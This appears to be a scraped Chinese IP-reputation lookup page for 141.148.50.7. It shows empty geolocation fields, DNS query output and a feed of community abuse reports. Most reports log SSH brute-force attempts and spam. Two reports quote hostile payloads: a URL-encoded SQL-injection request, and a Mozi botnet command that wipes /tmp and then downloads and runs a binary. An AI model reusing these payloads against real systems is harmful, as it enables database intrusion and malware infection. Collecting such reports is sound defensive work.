必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States of America (the)

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 141.148.50.7
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 60418
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;141.148.50.7.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025020602 1800 900 604800 86400

;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 07 13:07:42 CST 2025
;; MSG SIZE  rcvd: 105
HOST信息:
Host 7.50.148.141.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 7.50.148.141.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
109.70.100.39 attack
109.70.100.39 - - \[11/Sep/2020:02:57:53 +0200\] "GET /index.php\?id=ausland%22%29%29%29%2F%2A\&id=%2A%2FAND%2F%2A\&id=%2A%2F3026%3DCAST%28%28CHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%29%7C%7C%28SELECT%2F%2A\&id=%2A%2F%28CASE%2F%2A\&id=%2A%2FWHEN%2F%2A\&id=%2A%2F%283026%3D3026%29%2F%2A\&id=%2A%2FTHEN%2F%2A\&id=%2A%2FBITCOUNT%28BITSTRING_TO_BINARY%28%28CHR%2849%29%29%29%29%2F%2A\&id=%2A%2FELSE%2F%2A\&id=%2A%2FBITCOUNT%28BITSTRING_TO_BINARY%28%28CHR%2848%29%29%29%29%2F%2A\&id=%2A%2FEND%29%29%3A%3Avarchar%7C%7C%28CHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%29%2F%2A\&id=%2A%2FAS%2F%2A\&id=%2A%2FNUMERIC%29%2F%2A\&id=%2A%2FAND%2F%2A\&id=%2A%2F%28%28%28%22RiPg%22%2F%2A\&id=%2A%2FLIKE%2F%2A\&id=%2A%2F%22RiPg HTTP/1.1" 200 12303 "http://www.firma-lsf.eu:80/index.php" "Googlebot \(compatible  Googlebot/2.1   http://www.google.com/bot.html\)"
...
2020-09-11 16:06:06
179.162.112.58 attackbotsspam
fail2ban detected brute force on sshd
2020-09-11 16:07:56
134.175.59.225 attackbotsspam
134.175.59.225 (CN/China/-), 5 distributed sshd attacks on account [root] in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_DISTATTACK; Logs: Sep 11 01:33:00 server2 sshd[28413]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=111.95.141.34  user=root
Sep 11 01:27:53 server2 sshd[23334]: Failed password for root from 88.102.234.75 port 44984 ssh2
Sep 11 01:28:20 server2 sshd[24226]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=134.175.59.225  user=root
Sep 11 01:31:13 server2 sshd[26387]: Failed password for root from 173.242.122.149 port 51290 ssh2
Sep 11 01:28:23 server2 sshd[24226]: Failed password for root from 134.175.59.225 port 51094 ssh2

IP Addresses Blocked:

111.95.141.34 (ID/Indonesia/-)
88.102.234.75 (CZ/Czechia/-)
2020-09-11 16:04:04
107.172.80.103 attack
(From ThomasVancexU@gmail.com) Hello there! 

Would you'd be interested in building a mobile app for your business? I'm a mobile app developer that can design and program on any platform (Android, iOs) for an affordable price. There are various types of apps that can help your business, whether in terms of marketing, business efficiency, or both. If you already have some ideas, I would love to hear about them to help you more on how we can make them all possible. 

I have many ideas of my own that I'd really like to share with you of things that have worked really well for my other clients. If you're interested in building an app, or getting more information about it, then I'd love to give you a free consultation. Kindly reply to let me know when you'd like to be contacted. I hope to speak with you soon! 

Thanks!
Thomas Vance
Web Marketing Specialist
2020-09-11 15:56:43
202.83.42.235 attack
C2,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
2020-09-11 15:57:34
177.22.81.87 attackbots
Sep 11 03:17:21 jumpserver sshd[36163]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=177.22.81.87  user=root
Sep 11 03:17:24 jumpserver sshd[36163]: Failed password for root from 177.22.81.87 port 38366 ssh2
Sep 11 03:18:32 jumpserver sshd[36167]: Invalid user biology from 177.22.81.87 port 53220
...
2020-09-11 16:15:17
95.190.206.194 attackspam
Sep 11 09:02:00 root sshd[16570]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=95.190.206.194 
...
2020-09-11 16:11:25
188.169.36.83 attack
Listed on    rbldns-ru also zen-spamhaus and abuseat-org   / proto=17  .  srcport=11211  .  dstport=1027  .     (780)
2020-09-11 15:59:17
222.186.180.6 attack
Sep 11 09:08:26 rocket sshd[16353]: Failed password for root from 222.186.180.6 port 47912 ssh2
Sep 11 09:08:30 rocket sshd[16353]: Failed password for root from 222.186.180.6 port 47912 ssh2
Sep 11 09:08:33 rocket sshd[16353]: Failed password for root from 222.186.180.6 port 47912 ssh2
...
2020-09-11 16:09:26
119.28.32.60 attack
$f2bV_matches
2020-09-11 15:52:17
167.89.79.139 attackspambots
Spam from zoominfo.com
2020-09-11 15:40:57
132.148.28.20 attack
Automatic report - Banned IP Access
2020-09-11 16:16:06
159.89.113.87 attack
Abuse
2020-09-11 15:52:01
24.212.13.95 attack
Lines containing failures of 24.212.13.95
Sep 10 19:23:22 mellenthin sshd[12496]: User r.r from 24.212.13.95 not allowed because not listed in AllowUsers
Sep 10 19:23:23 mellenthin sshd[12496]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=24.212.13.95  user=r.r
Sep 10 19:23:25 mellenthin sshd[12496]: Failed password for invalid user r.r from 24.212.13.95 port 59812 ssh2
Sep 10 19:23:25 mellenthin sshd[12496]: Connection closed by invalid user r.r 24.212.13.95 port 59812 [preauth]


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=24.212.13.95
2020-09-11 15:43:06
70.113.6.9 attack
Sep 11 02:03:08 itv-usvr-01 sshd[5004]: Invalid user admin from 70.113.6.9
Sep 11 02:03:08 itv-usvr-01 sshd[5005]: Invalid user admin from 70.113.6.9
Sep 11 02:03:08 itv-usvr-01 sshd[5004]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=70.113.6.9
Sep 11 02:03:08 itv-usvr-01 sshd[5004]: Invalid user admin from 70.113.6.9
Sep 11 02:03:09 itv-usvr-01 sshd[5004]: Failed password for invalid user admin from 70.113.6.9 port 47668 ssh2
Sep 11 02:03:08 itv-usvr-01 sshd[5005]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=70.113.6.9
Sep 11 02:03:08 itv-usvr-01 sshd[5005]: Invalid user admin from 70.113.6.9
Sep 11 02:03:09 itv-usvr-01 sshd[5005]: Failed password for invalid user admin from 70.113.6.9 port 47692 ssh2
2020-09-11 16:02:59

最近上报的IP列表

189.230.81.120 181.64.254.51 226.231.206.85 98.157.221.108
4.239.171.171 133.22.97.240 180.85.74.35 6.126.128.79
73.8.158.170 55.67.192.11 140.244.1.41 84.80.57.50
179.129.44.131 13.113.23.163 97.140.128.227 77.32.223.18
206.64.21.223 214.166.108.152 172.197.5.127 168.2.249.109